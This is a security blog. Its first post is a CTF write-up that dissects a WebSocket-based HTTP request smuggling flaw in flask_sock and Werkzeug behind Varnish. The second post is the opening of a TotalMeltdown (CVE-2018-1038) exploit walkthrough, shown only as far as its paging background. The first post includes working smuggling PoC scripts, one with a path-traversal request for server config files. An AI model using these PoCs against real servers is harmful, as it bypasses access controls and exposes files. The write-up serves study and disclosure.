Thursday, August 17, 2023

A tale of a weird WebSocket-based HTTP request smuggling bug

I recently played Securinets CTF, which hosted a Web challenge, Mark4Archive by @nzeros, that required bypassing this Varnish rule:

if (req.url ~ "^/api/pdf") {
    # Respond with a 403 Forbidden status
    return (synth(403, "Forbidden - Internal Endpoint"));
}
I, and most of the people who solved the challenge, bypassed the rule by simply prepending extra slashes to the path so that the regex no longer matches (e.g. //api/pdf). However, when the CTF ended, the author disclosed the intended way to bypass the Varnish rule: HTTP request smuggling using WebSockets. This is the block that handles WebSocket connections in the challenge's Varnish configuration file:
    if (req.http.upgrade ~ "(?i)websocket") {
        return (pipe);
    }
For a WebSocket connection Varnish returns pipe, which means that from then on Varnish forwards whatever the client sends on the same socket straight to the backend. That makes sense for WebSockets, where the traffic after the initial HTTP handshake consists of raw binary WebSocket frames that should be passed directly to the backend WebSocket server.
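
As a quick sanity check of the extra-slash bypass described above, here is a minimal sketch that uses Python's re module as a stand-in for Varnish's regex engine. That substitution is an assumption made for illustration; the only thing it relies on is that the ^ anchor behaves the same way. The is_blocked helper is hypothetical and not part of the challenge.

```python
import re

# Pattern copied from the Varnish rule. Python's re is only a stand-in here
# (assumption: "^" anchors at the start of the URL in both engines).
BLOCKED = re.compile(r"^/api/pdf")


def is_blocked(url: str) -> bool:
    """Return True if the rule would answer 403 for this URL."""
    return BLOCKED.search(url) is not None


if __name__ == "__main__":
    for url in ("/api/pdf", "/api/pdf?p=x", "//api/pdf", "/echo"):
        print(f"{url!r:18} blocked={is_blocked(url)}")
```

The doubled slash moves /api/pdf away from the start of the string, so the anchored pattern no longer matches, while the backend still routes the request to the same endpoint.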

The challenge author's writeup has the PoC script that exploits the HTTP request smuggling issue, and references the technique disclosed some time ago by @0ang3el; you can read more about it here. TL;DR: trick the frontend server (e.g. Varnish) into thinking that the backend has reserved the current socket for a WebSocket connection when it has not, so that the frontend keeps the socket to the backend open and you can issue arbitrary HTTP requests that bypass the frontend's rules. But looking at the PoC script:


import socket
import os
req1 = '''GET /echo HTTP/1.1
Host: 20.197.61.105:80
Sec-WebSocket-Version: 13
Upgrade: websocket
Connection: Upgrade
Sec-WebSocket-Key: qsdqsdqs
New: aaasaa

'''.replace('\n', '\r\n')


req2 = '''GET /api/pdf?p=../../../../../../../usr/src/app/config/__pycache__/config.cpython-37.pyc HTTP/1.1
Host: 20.197.61.105:80

'''.replace('\n', '\r\n')




def main(netloc):
    host, port = netloc.split(':')

    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.connect((host, int(port)))
    print("supposed connected")
    sock.sendall(req1.encode('utf-8'))
    data1 = sock.recv(4096).decode()
    print("data1 \n", data1)
    print("----------")

    sock.sendall(req2.encode('utf-8'))
    data = sock.recv(8192)

    print("data",data)

    sock.sendall(req2.encode('utf-8'))
    data = sock.recv(8192)

    print("data2",data)
    a = []
    #print(sock.recv(8192))
    start = False
    while (x:=sock.recv(2048)) != b"":
        if b"PDF-" in x:
            x = x[x.find(b"%PDF-"):]
            start = True
        if start:
            a.append(x)
        else:
            print(x)
    #print(a) 
    # print(sock.recv(8192))
    
    # print(sock.recv(2048))
    # print(sock.recv(2048))
    # print(sock.recv(1024))
    # print(sock.recv(1024))
    # print(sock.recv(1024))
    # print(sock.recv(1024))
    # print(sock.recv(1024))
    sock.shutdown(socket.SHUT_RDWR)
    sock.close()
    data= b''.join(a).replace(b'\r\n', b'')
    print(data)

    it = 0
    idx = data.find(b'\n')
    parsed = data[:idx+1]
    data = data[idx:]

    while (idx := data.find(b'\n')) != -1:
        print("parsed", parsed)
        data = data[idx+1:]
        print("data", data[:50])
        offsetEnd = 1
        offset = int(b"0x"+data[:offsetEnd], 16)
        if offset == 0:
            break
        while data[offsetEnd:][offset-1] != 10:
            #print(data[offsetEnd:])
            #print(offset, data[offsetEnd:][offset])
            offsetEnd += 1
            offset = int(b"0x"+data[:offsetEnd], 16)
        print("toadd", data[offsetEnd:][:offset])
        parsed += data[offsetEnd:][:offset]
        
        print(parsed)
        it +=1
        if it == 2:
            pass

    if os.path.exists("output_sol.pdf"):
        os.remove("output_sol.pdf")
    with open('output_sol.pdf', 'wb') as f:
        f.write(parsed)

if __name__ == "__main__":
    main('20.197.61.105:80')
You will notice that the WebSocket handshake is actually valid: the backend honors it and returns a 101 response upgrading the connection to WebSocket. Although the PoC works (/api/pdf is hit and its response is retrieved), this is clearly not a Varnish issue: the handshake completes and is valid, so there is no "tricking" here. Rather, the backend somehow executes HTTP requests even though they are sent down the WebSocket stream.

To confirm this, I created a minimal backend with one HTTP endpoint and one WebSocket endpoint, edited the PoC to GET /internal instead of /api/pdf, and ran it directly against the minimal backend (no Varnish at all). My guess was right: the app returned the 101 upgrade response, followed by WebSocket messages, then the response to the "smuggled" request to /internal. This is the minimal backend:
from flask import Flask, Response
from flask_sock import Sock
import time

import json

app = Flask(__name__)
sock = Sock(app)

@app.route('/internal')
def internal():
    return "ACCESS GRANTED", 200

@sock.route('/echo')
def echo(sock):
    total_size = 100
    progress = 0
    while progress < total_size:
        time.sleep(0.1)
        progress += 10
        sock.send(json.dumps({'progress': progress}))
    return "complete!"

if __name__ == '__main__':
    app.run()


Now it is clear that the issue is in flask_sock or some other Python component, not in Varnish. After several hours of debugging, it turned out that the whole socket input was being treated as pipelined HTTP requests, at least as far as Python's http.server is concerned.

this is an example of an HTTP request that uses pipelining:

GET /first HTTP/1.1
Host: 127.0.0.1
Connection: keep-alive

GET /second HTTP/1.1
Host: 127.0.0.1
Connection: close

if you try pipelining HTTP requests directly on the app it won't work:


That is because Werkzeug does not support it and always returns a Connection: close header. Here is the relevant snippet:
	# Always close the connection. This disables HTTP/1.1
	# keep-alive connections. They aren't handled well by
	# Python's http.server because it doesn't know how to
	# drain the stream before the next request line.
	self.send_header("Connection", "close")
	self.end_headers()
But http.server's BaseHTTPRequestHandler does support it; you just need to set the handler's protocol_version property to HTTP/1.1 or higher:
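
To make this concrete, here is a small self-contained sketch using only the standard library. It starts an http.server handler with protocol_version set to HTTP/1.1 on a random local port and sends the two pipelined requests from the example above in a single write. The PipelineHandler, send_pipelined and demo names are made up for this illustration.

```python
import socket
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer


class PipelineHandler(BaseHTTPRequestHandler):
    # Enabling HTTP/1.1 is what allows keep-alive (and thus pipelining).
    protocol_version = "HTTP/1.1"

    def do_GET(self):
        body = self.path.encode()
        self.send_response(200)
        # Content-Length is needed so the client knows where the body ends.
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, format, *args):
        pass  # keep the demo output quiet


def send_pipelined(port: int) -> bytes:
    """Send two requests back to back and return everything the server sends."""
    payload = (
        b"GET /first HTTP/1.1\r\nHost: 127.0.0.1\r\nConnection: keep-alive\r\n\r\n"
        b"GET /second HTTP/1.1\r\nHost: 127.0.0.1\r\nConnection: close\r\n\r\n"
    )
    chunks = []
    with socket.create_connection(("127.0.0.1", port)) as s:
        s.sendall(payload)
        while True:
            data = s.recv(4096)
            if not data:
                break
            chunks.append(data)
    return b"".join(chunks)


def demo() -> bytes:
    server = HTTPServer(("127.0.0.1", 0), PipelineHandler)  # port 0: pick a free port
    threading.Thread(target=server.serve_forever, daemon=True).start()
    try:
        return send_pipelined(server.server_address[1])
    finally:
        server.shutdown()
        server.server_close()


if __name__ == "__main__":
    print(demo().decode())
```

Both requests are answered on the same connection, and the server only closes it after the second request because that one carries Connection: close.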


Werkzeug does set its protocol_version to HTTP/1.1 (when thread or process workers are used); here is the relevant code:
        # If the handler doesn't directly set a protocol version and
        # thread or process workers are used, then allow chunked
        # responses and keep-alive connections by enabling HTTP/1.1.
        if "protocol_version" not in vars(handler) and (
            self.multithread or self.multiprocess
        ):
            handler.protocol_version = "HTTP/1.1"
But pipelining still does not work, because of this snippet:

	# Always close the connection. This disables HTTP/1.1
	# keep-alive connections. They aren't handled well by
	# Python's http.server because it doesn't know how to
	# drain the stream before the next request line.
	self.send_header("Connection", "close")
	self.end_headers()
self.send_header() sets a flag that stops http.server's BaseHTTPRequestHandler from reading further from the socket (so only the first request is handled):
    def send_header(self, keyword, value):
        """Send a MIME header to the headers buffer."""
        if self.request_version != 'HTTP/0.9':
            if not hasattr(self, '_headers_buffer'):
                self._headers_buffer = []
            self._headers_buffer.append(
                ("%s: %s\r\n" % (keyword, value)).encode('latin-1', 'strict'))

        if keyword.lower() == 'connection':
            if value.lower() == 'close':
                self.close_connection = True
            elif value.lower() == 'keep-alive':
                self.close_connection = False
If the header is Connection and the value is close, self.close_connection is set to True. This flag controls whether BaseHTTPRequestHandler's handle routine keeps looking for more HTTP requests on the same socket, as you can see here:
    def handle(self):
        """Handle multiple requests if necessary."""
        self.close_connection = True

        self.handle_one_request()
        while not self.close_connection:
            self.handle_one_request()
It is set to True by default, which means only one request is handled, but handle_one_request later sets it to False if the Connection header value is not close and the HTTP version is >= 1.1. Now you might be wondering why this works with WebSockets: we know that Werkzeug always calls send_header with Connection: close after each route has finished executing, which should set self.close_connection to True and break the loop. Let's have a look at the flask_sock code:
        def decorator(f):
            @wraps(f)
            def websocket_route(*args, **kwargs):  # pragma: no cover
                ws = Server(request.environ, **current_app.config.get(
                    'SOCK_SERVER_OPTIONS', {}))
                try:
                    f(ws, *args, **kwargs)
                except ConnectionClosed:
                    pass
                try:
                    ws.close()
                except:  # noqa: E722
                    pass

                class WebSocketResponse(Response):
                    def __call__(self, *args, **kwargs):
                        if ws.mode == 'eventlet':
                            try:
                                from eventlet.wsgi import WSGI_LOCAL
                                ALREADY_HANDLED = []
                            except ImportError:
                                from eventlet.wsgi import ALREADY_HANDLED
                                WSGI_LOCAL = None

                            if hasattr(WSGI_LOCAL, 'already_handled'):
                                WSGI_LOCAL.already_handled = True
                            return ALREADY_HANDLED
                        elif ws.mode == 'gunicorn':
                            raise StopIteration()
                        elif ws.mode == 'werkzeug':
                            raise ConnectionError()
                        else:
                            return []

                return WebSocketResponse()
This is the decorator applied to routes defined with @sock.route; f() is the decorated route. Every time an HTTP request is received at a route defined with @sock.route, websocket_route runs. It instantiates a new Server from the simple-websocket package and calls the route with that Server object.

The handshake method is called upon Server initialization:
    def handshake(self):
        in_data = b'GET / HTTP/1.1\r\n'
        for key, value in self.environ.items():
            if key.startswith('HTTP_'):
                header = '-'.join([p.capitalize() for p in key[5:].split('_')])
                in_data += f'{header}: {value}\r\n'.encode()
        in_data += b'\r\n'
        self.ws.receive_data(in_data)
        self.connected = self._handle_events()
It rebuilds the HTTP handshake request from the parsed headers, since the original request has already been consumed by the HTTP server. Once rebuilt, it is fed to the WebSocket protocol object using the receive_data method; self.ws.events() then yields a handshake Request event, which is handled by the _handle_events method.

    def _handle_events(self):
        keep_going = True
        out_data = b''
        for event in self.ws.events():
            try:
                if isinstance(event, Request):
                    self.subprotocol = self.choose_subprotocol(event)
                    out_data += self.ws.send(AcceptConnection(
                        subprotocol=self.subprotocol,
                        extensions=[PerMessageDeflate()]))
                elif isinstance(event, CloseConnection):
                    if self.is_server:
                        out_data += self.ws.send(event.response())
                    self.close_reason = event.code
                    self.close_message = event.reason
                    self.connected = False
                    self.event.set()
                    keep_going = False
                elif isinstance(event, Ping):
                    out_data += self.ws.send(event.response())
                elif isinstance(event, Pong):
                    self.pong_received = True
                elif isinstance(event, (TextMessage, BytesMessage)):
                    self.incoming_message_len += len(event.data)
                    if self.max_message_size and \
                            self.incoming_message_len > self.max_message_size:
                        out_data += self.ws.send(CloseConnection(
                            CloseReason.MESSAGE_TOO_BIG, 'Message is too big'))
                        self.event.set()
                        keep_going = False
                        break
                    if self.incoming_message is None:
                        # store message as is first
                        # if it is the first of a group, the message will be
                        # converted to bytearray on arrival of the second
                        # part, since bytearrays are mutable and can be
                        # concatenated more efficiently
                        self.incoming_message = event.data
                    elif isinstance(event, TextMessage):
                        if not isinstance(self.incoming_message, bytearray):
                            # convert to bytearray and append
                            self.incoming_message = bytearray(
                                (self.incoming_message + event.data).encode())
                        else:
                            # append to bytearray
                            self.incoming_message += event.data.encode()
                    else:
                        if not isinstance(self.incoming_message, bytearray):
                            # convert to mutable bytearray and append
                            self.incoming_message = bytearray(
                                self.incoming_message + event.data)
                        else:
                            # append to bytearray
                            self.incoming_message += event.data
                    if not event.message_finished:
                        continue
                    if isinstance(self.incoming_message, (str, bytes)):
                        # single part message
                        self.input_buffer.append(self.incoming_message)
                    elif isinstance(event, TextMessage):
                        # convert multi-part message back to text
                        self.input_buffer.append(
                            self.incoming_message.decode())
                    else:
                        # convert multi-part message back to bytes
                        self.input_buffer.append(bytes(self.incoming_message))
                    self.incoming_message = None
                    self.incoming_message_len = 0
                    self.event.set()
                else:  # pragma: no cover
                    pass
            except LocalProtocolError:  # pragma: no cover
                out_data = b''
                self.event.set()
                keep_going = False
        if out_data:
            self.sock.send(out_data)
        return keep_going
out_data is the HTTP upgrade response, and the WebSocket server sends it to the client directly on the socket, without involving Werkzeug.
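
For reference, the one non-trivial value in that upgrade response is the Sec-WebSocket-Accept header, which RFC 6455 derives from the client's Sec-WebSocket-Key. The sketch below shows that derivation with the standard library; it is not the library's own code (the protocol layer computes it internally), and accept_value is a name chosen for this example.

```python
import base64
import hashlib

# Fixed GUID defined by RFC 6455 for the opening handshake.
WS_GUID = "258EAFA5-E914-47DA-95CA-C5AB0DC85B11"


def accept_value(sec_websocket_key: str) -> str:
    """Compute Sec-WebSocket-Accept for a given Sec-WebSocket-Key."""
    digest = hashlib.sha1((sec_websocket_key + WS_GUID).encode("ascii")).digest()
    return base64.b64encode(digest).decode("ascii")


if __name__ == "__main__":
    # Sample key taken from RFC 6455, section 1.3.
    print(accept_value("dGhlIHNhbXBsZSBub25jZQ=="))
```

A frontend that only checks for a 101 status and a matching accept value has no way to tell that the backend will later go back to parsing HTTP on the same socket.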

At this point Werkzeug is still waiting for the route to finish executing and return the response:
        def execute(app: WSGIApplication) -> None:
            application_iter = app(environ, start_response)
            try:
                for data in application_iter:
                    write(data)
                if not headers_sent:
                    write(b"")
                if chunk_response:
                    self.wfile.write(b"0\r\n\r\n")
            finally:
                # Check for any remaining data in the read socket, and discard it. This
                # will read past request.max_content_length, but lets the client see a
                # 413 response instead of a connection reset failure. If we supported
                # keep-alive connections, this naive approach would break by reading the
                # next request line. Since we know that write (above) closes every
                # connection we can read everything.
                selector = selectors.DefaultSelector()
                selector.register(self.connection, selectors.EVENT_READ)
                total_size = 0
                total_reads = 0

                # A timeout of 0 tends to fail because a client needs a small amount of
                # time to continue sending its data.
                while selector.select(timeout=0.01):
                    # Only read 10MB into memory at a time.
                    data = self.rfile.read(10_000_000)
                    total_size += len(data)
                    total_reads += 1

                    # Stop reading on no data, >=10GB, or 1000 reads. If a client sends
                    # more than that, they'll get a connection reset failure.
                    if not data or total_size >= 10_000_000_000 or total_reads > 1000:
                        break

                selector.close()
The Flask app is called in the first line; app() is responsible for resolving the route internally and calling the right handler, in this case websocket_route and then the echo function, which sleeps for about 1 second in total and then returns. But looking closely at websocket_route, you will notice that our returned response (i.e. "complete!") is not used at all: websocket_route does not even capture the return value of echo. Instead it returns a WebSocketResponse() object:


                class WebSocketResponse(Response):
                    def __call__(self, *args, **kwargs):
                        if ws.mode == 'eventlet':
                            try:
                                from eventlet.wsgi import WSGI_LOCAL
                                ALREADY_HANDLED = []
                            except ImportError:
                                from eventlet.wsgi import ALREADY_HANDLED
                                WSGI_LOCAL = None

                            if hasattr(WSGI_LOCAL, 'already_handled'):
                                WSGI_LOCAL.already_handled = True
                            return ALREADY_HANDLED
                        elif ws.mode == 'gunicorn':
                            raise StopIteration()
                        elif ws.mode == 'werkzeug':
                            raise ConnectionError()
                        else:
                            return []

                return WebSocketResponse()
In our case ws.mode is werkzeug, so ConnectionError() is raised, which is caught here:
    def run_wsgi(self) -> None:
        if self.headers.get("Expect", "").lower().strip() == "100-continue":
            self.wfile.write(b"HTTP/1.1 100 Continue\r\n\r\n")

        self.environ = environ = self.make_environ()
        status_set: str | None = None
        headers_set: list[tuple[str, str]] | None = None
        status_sent: str | None = None
        headers_sent: list[tuple[str, str]] | None = None
        chunk_response: bool = False
        
        [snipped]
        
        try:
            execute(self.server.app)
        except (ConnectionError, socket.timeout) as e:
            self.connection_dropped(e, environ)
        except Exception as e:
            if self.server.passthrough_errors:
                raise

            if status_sent is not None and chunk_response:
                self.close_connection = True

            try:
                # if we haven't yet sent the headers but they are set
                # we roll back to be able to set them again.
                if status_sent is None:
                    status_set = None
                    headers_set = None
                execute(InternalServerError())
            except Exception:
                pass

            from .debug.tbtools import DebugTraceback

            msg = DebugTraceback(e).render_traceback_text()
            self.server.log("error", f"Error on request:\n{msg}")
self.connection_dropped is called, which is defined here:
    def connection_dropped(
        self, error: BaseException, environ: WSGIEnvironment | None = None
    ) -> None:
        """Called if the connection was closed by the client.  By default
        nothing happens.
        """
The function does nothing, so run_wsgi returns, marking the end of the current request (GET /echo) and leaving self.close_connection set to False. BaseHTTPRequestHandler then continues handling the rest of the HTTP requests on the socket, treating them as pipelined HTTP requests.
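
The control flow described so far can be condensed into a toy model. The sketch below is not Werkzeug or http.server code: handle_connection is a simplified stand-in for the handle() loop, and werkzeug_like is a hypothetical predicate that encodes the observation above (normal routes end with Connection: close, the WebSocket route bails out with ConnectionError before any header is sent).

```python
import io


def handle_connection(raw: bytes, closes_connection) -> list:
    """Toy version of the handle() loop: return the paths that get served."""
    rfile = io.BytesIO(raw)  # plays the role of self.rfile
    handled = []
    while True:
        request_line = rfile.readline()
        if not request_line.strip():
            break  # nothing left to read on the "socket"
        path = request_line.split()[1].decode()
        while rfile.readline().strip():
            pass  # skip the headers up to the blank line
        handled.append(path)
        if closes_connection(path):
            break  # Connection: close was sent, stop after this request
    return handled


def werkzeug_like(path: str) -> bool:
    # Assumption for the model: only the WebSocket route skips "Connection: close".
    return path != "/echo"


UPGRADE = (
    b"GET /echo HTTP/1.1\r\nHost: localhost\r\n"
    b"Upgrade: websocket\r\nConnection: Upgrade\r\n\r\n"
)
SMUGGLED = b"GET /internal HTTP/1.1\r\n\r\n"
PLAIN = b"GET /first HTTP/1.1\r\n\r\nGET /second HTTP/1.1\r\n\r\n"

if __name__ == "__main__":
    print(handle_connection(UPGRADE + SMUGGLED, werkzeug_like))
    print(handle_connection(PLAIN, werkzeug_like))
```

In this model, plain pipelining stops after the first request, while anything queued behind the WebSocket handshake is still picked up.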
It should be noted that at this point the socket has been closed, because websocket_route called ws.close(), which closes the socket:
    def close(self, reason=None, message=None):
        super().close(reason=reason, message=message)
        self.sock.close()
BaseHTTPRequestHandler can still read the remaining data from the socket without exceptions because it does not use the socket object directly; instead it has a file object that wraps the socket (i.e. self.rfile). This is the setup method of the class:
    def setup(self):
        self.connection = self.request
        if self.timeout is not None:
            self.connection.settimeout(self.timeout)
        if self.disable_nagle_algorithm:
            self.connection.setsockopt(socket.IPPROTO_TCP,
                                       socket.TCP_NODELAY, True)
        self.rfile = self.connection.makefile('rb', self.rbufsize)
        if self.wbufsize == 0:
            self.wfile = _SocketWriter(self.connection)
        else:
            self.wfile = self.connection.makefile('wb', self.wbufsize)
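
The effect of makefile() can be reproduced in isolation. This is a minimal sketch using socket.socketpair() in place of a real client connection (an assumption made to keep it self-contained); read_after_close is a hypothetical helper name.

```python
import socket


def read_after_close() -> bytes:
    """Read through a makefile() object after close() was called on its socket."""
    server_side, client_side = socket.socketpair()
    rfile = server_side.makefile("rb")  # same call as in setup()
    try:
        client_side.sendall(b"GET /internal HTTP/1.1\r\n\r\n")
        # close() only marks the socket object as closed; the descriptor stays
        # open for as long as a file object created by makefile() is alive.
        server_side.close()
        return rfile.readline()
    finally:
        rfile.close()
        client_side.close()


if __name__ == "__main__":
    print(read_after_close())
```

The request line is still readable through rfile even though close() has already been called on the socket it was created from.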
Now that we understand the issue better, here is a simple script that GETs /internal:
import socket

req3 = '''GET /echo HTTP/1.1
Host: localhost
Connection: Upgrade
Pragma: no-cache
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36
Upgrade: websocket
Origin: http://127.0.0.1
Sec-WebSocket-Version: 13
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Sec-WebSocket-Key: V4XssCMN39pL17Emy4b7mQ==

GET /internal HTTP/1.1

'''

sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect(("127.0.0.1", int("5000")))
print("connected")

sock.sendall(req3.encode('utf-8'))
while True:
    data = sock.recv(8192)
    if data == b'':
        break
    print(data.decode(errors='ignore'))
which gives:


There is one issue left: if the WebSocket route were reading data from the socket, it would consume our second HTTP request. Let's change our minimal backend and test that:


from flask import Flask, Response
from flask_sock import Sock
import time

import json

app = Flask(__name__)
sock = Sock(app)

@app.route('/internal')
def internal():
    return "ACCESS GRANTED", 200

@sock.route('/echo')
def echo(sock):
    while True:
        data = sock.receive()
        sock.send(data)

if __name__ == '__main__':
    app.run()
If you run the same exploit against this new backend it won't work, because the sock.receive() call will consume our second HTTP request as WebSocket data. To fix that we can abuse the background polling thread of simple-websocket: if this thread receives invalid WebSocket data, it sets self.connected to False. This is the thread routine:
    def _thread(self):
        sel = None
        if self.ping_interval:
            next_ping = time() + self.ping_interval
            sel = self.selector_class()
            sel.register(self.sock, selectors.EVENT_READ, True)

        while self.connected:
            try:
                if sel:
                    now = time()
                    if next_ping <= now or not sel.select(next_ping - now):
                        # we reached the timeout, we have to send a ping
                        if not self.pong_received:
                            self.close(reason=CloseReason.POLICY_VIOLATION,
                                       message='Ping/Pong timeout')
                            break
                        self.pong_received = False
                        self.sock.send(self.ws.send(Ping()))
                        next_ping = max(now, next_ping) + self.ping_interval
                        continue
                in_data = self.sock.recv(self.receive_bytes)
                if len(in_data) == 0:
                    raise OSError()
            except (OSError, ConnectionResetError):  # pragma: no cover
                self.connected = False
                self.event.set()
                break

            self.ws.receive_data(in_data)
            self.connected = self._handle_events()
        sel.close() if sel else None
        self.sock.close()
It receives data, then calls self._handle_events, which returns False for invalid WebSocket data. self.connected is then set to False and the background thread exits. The WebSocket route will try to call sock.receive, but a ConnectionClosed exception will be raised:

    def receive(self, timeout=None):
        """Receive data over the WebSocket connection.

        :param timeout: Amount of time to wait for the data, in seconds. Set
                        to ``None`` (the default) to wait indefinitely. Set
                        to 0 to read without blocking.

        The data received is returned, as ``bytes`` or ``str``, depending on
        the type of the incoming message.
        """
        while self.connected and not self.input_buffer:
            if not self.event.wait(timeout=timeout):
                return None
            self.event.clear()
        if not self.connected:  # pragma: no cover
            raise ConnectionClosed(self.close_reason, self.close_message)
        return self.input_buffer.pop(0)
The exception is caught by websocket_route, which again returns and leaves the socket free to use. Here is the new PoC:

import socket

req1 = '''GET /echo HTTP/1.1
Host: localhost
Connection: Upgrade
Pragma: no-cache
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36
Upgrade: websocket
Origin: http://127.0.0.1
Sec-WebSocket-Version: 13
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Sec-WebSocket-Key: V4XssCMN39pL17Emy4b7mQ==

'''
req2 = '''GET /internal HTTP/1.1

'''

sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect(("127.0.0.1", int("5000")))
print("connected")

sock.sendall(req1.encode('utf-8'))
print(sock.recv(8192).decode(errors='ignore'))

sock.sendall(("A"*4096).encode('utf-8'))
__import__("time").sleep(2)
print(sock.recv(8192).decode(errors='ignore'))

sock.sendall(req2.encode('utf-8'))
while True:
    data = sock.recv(8192)
    if data == b'':
        break
    print(data.decode(errors='ignore'))
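
To see why a run of "A" bytes does not form a valid client frame, here is a sketch that decodes the first two header bytes using the RFC 6455 frame layout. Which exact check the WebSocket library trips on is not shown in this post, so treat this as one plausible explanation; parse_frame_header is a name made up for the example.

```python
def parse_frame_header(data: bytes) -> dict:
    """Decode the first two bytes of a WebSocket frame (RFC 6455, section 5.2)."""
    first, second = data[0], data[1]
    return {
        "fin": bool(first & 0x80),
        "rsv1": bool(first & 0x40),
        "rsv2": bool(first & 0x20),
        "rsv3": bool(first & 0x10),
        "opcode": first & 0x0F,
        "masked": bool(second & 0x80),
        "payload_len": second & 0x7F,
    }


if __name__ == "__main__":
    # "A" is 0x41, so the junk payload starts with the bytes 0x41 0x41.
    print(parse_frame_header(b"A" * 4096))
```

The MASK bit is clear, and RFC 6455 requires every client-to-server frame to be masked, so a compliant server has grounds to fail the connection on this input.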
 

Monday, November 29, 2021

Exploiting TotalMeltdown: the fine way

CVE-2018-1038, aka TotalMeltdown, is quite an old bug (2018) but still an awesome one, so I decided to write a decent exploit for it.

The vulnerability was discovered by @ulffrisk. The first functioning LPE PoC was released by @xpn, who also wrote a blog post about it, which you can find here. I used @xpn's blog post to write my first exploit; it worked, but it kept crashing the system because it overwrote some critical memory regions, and the raw physical memory search took ages. So I wrote another, cleaner exploit, which I will walk you through in this post.

TotalMeltdown


CVE-2018-1038 is a logic bug: while mitigating the Meltdown vulnerability, Microsoft set a bit (U/S) that was not supposed to be set in one of the PML4 (Page Map Level 4) entries.

By setting the U/S (User/Supervisor) bit in the PML4 entry at index 0x1ED, Microsoft allowed any user-mode (ring 3) program to access any physical memory mapped through this particular entry. The catch is that PML4 entry 0x1ED was actually the self-referencing PML4 entry, which makes it worse than just reading and writing the physical memory mapped through this entry!

Paging 101


As you may already know, the addresses programs use to reference memory are not the real addresses used to address the physical memory installed in your computer. They are called virtual addresses and must first be translated to physical addresses, which is usually done by the MMU in your CPU. Virtual addressing is provided by enabling paging in the CPU (the OS does this in the early stages of booting).

So how is this Virtual Address is translated anyway? well let's first see what a Virtual Address is:

As you can see the Virtual Address is just a bunch of offsets (or indexes) in some tables, and by understanding these tables we can eventually understand paging.

There are 4 tables (in long mode paging, i.e. PAE enabled and 4KiB page size) that the paging mechanism requires to be set up before paging is enabled (otherwise the system will crash right after enabling it). They must be set up in advance because once the OS enables paging (by setting the PG bit in the CR0 register), every address afterwards is treated as a virtual address and is translated by the MMU. Each table is 4KiB in size and holds 512 entries (4KiB / 8).

The first table, at the top of the hierarchy, is the Page Map Level 4 table, PML4 for short; there is only 1 PML4 per process. The second is the PDP, or Page Directory Pointer table: every entry in the PML4 holds the base address of a PDP table, so there are up to 512 PDP tables if all the PML4 entries are used. Next is the PD, or Page Directory table, with up to 512 PD tables under each PDP, and finally the PT, or Page Table, with up to 512 PT tables under each PD.

How those pages are linked and work together is quite simple, every entry of these tables (8 bytes on x86-64) is a physical address to the next table starting from the PML4 to the PT. And every offset (or index) in the Virtual Address being translated is used within that table.

For example, if the PML4 physical address is 0x1000 (table addresses are always page aligned and their size is the same as the page size, i.e. 4KiB) and the PML4 index of the virtual address is 0xe4, then the MMU would extract the address of the next table (PDP) by reading the entry at base of the table + index * size of entry (8 on x86-64), which is 0x1000 + (0xe4 * 8) = 0x1720.

Here is how the full translation is done:
At the end of the day, a physical address is obtained by reading the entry in the PT. This physical address points to a physical page/frame, and the 12-bit offset is used within this page to reach any position in it.

let's try to translate this virtual address: 0xfffffa80018ab040 which is the address of the System's EPROCESS in my testing VM, first let's get the indexes:
  • first 12 bits are the offset in the page: 0x40
  • next 9 bits of the PT index: 0xab
  • next 9 bits of the PD index: 0xc
  • next 9 bits of the PDP index: 0
  • next 9 bits of the PML4 index: 0x1f5
  • the most significant 16 bits: 0xffff.
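The index extraction above can be sketched in a few lines of Python. This is only an illustration of the bit slicing, and the helper name split_va is made up for this example:

```python
def split_va(va):
    """Split a 64-bit virtual address into (pml4, pdp, pd, pt, offset)."""
    offset = va & 0xFFF          # low 12 bits: offset inside the 4KiB page
    pt = (va >> 12) & 0x1FF      # next 9 bits: PT index
    pd = (va >> 21) & 0x1FF      # next 9 bits: PD index
    pdp = (va >> 30) & 0x1FF     # next 9 bits: PDP index
    pml4 = (va >> 39) & 0x1FF    # next 9 bits: PML4 index
    return pml4, pdp, pd, pt, offset


# The System EPROCESS address used in this post.
print([hex(i) for i in split_va(0xfffffa80018ab040)])
# ['0x1f5', '0x0', '0xc', '0xab', '0x40']
```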

For a Virtual Address to be valid it must be a canonical address, meaning the most significant 16 bits of the Virtual Address must be the sign extension of the most significant bit of the PML4 index (bit 47): if that bit is 1 the upper 16 bits must all be 1 (0xFFFF), and if it is 0 they must all be 0 (0x0000).

Any value for these 16 bits other than 0x0000 and 0xffff means the address is not canonical and thus invalid, and using it results in a #GP fault. Why is this there in the first place? Currently only 48-bit virtual addresses are used (9 bits PML4 index + 9 bits PDP index + 9 bits PD index + 9 bits PT index + 12 bits offset), which gives a 256 terabyte virtual address space using only 4 levels of paging tables (instead of the 6 levels a full 64-bit virtual address would need).

The designers could have just made the CPU ignore whatever is in the upper 16 bits, but then programmers would take advantage of these "free" 16 bits to store extra information, and when the CPU designers eventually decide to extend the width of virtual addresses, code relying on the "free" upper 16 bits would break. The canonical address concept simply prevents this from happening.

which makes the valid virtual address ranges:
  • 0x0000000000000000-0x00007fffffffffff (generally used for userspace, differs per process)
  • 0xffff800000000000-0xffffffffffffffff (generally used for kernel space and mapped in every process, or at least it was before the Meltdown vulnerability, see: KVAS/KPTI)
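A minimal sketch of the canonical check in Python, assuming 48-bit virtual addresses as described above (the function name is made up for this example): bits 63..47 must all be equal.

```python
def is_canonical(va):
    """True if bits 63..48 are a sign extension of bit 47 (48-bit addressing)."""
    top = (va >> 47) & 0x1FFFF   # bits 63..47, 17 bits in total
    return top == 0 or top == 0x1FFFF


print(is_canonical(0x00007fffffffffff))  # True, top of the lower half
print(is_canonical(0xffff800000000000))  # True, bottom of the upper half
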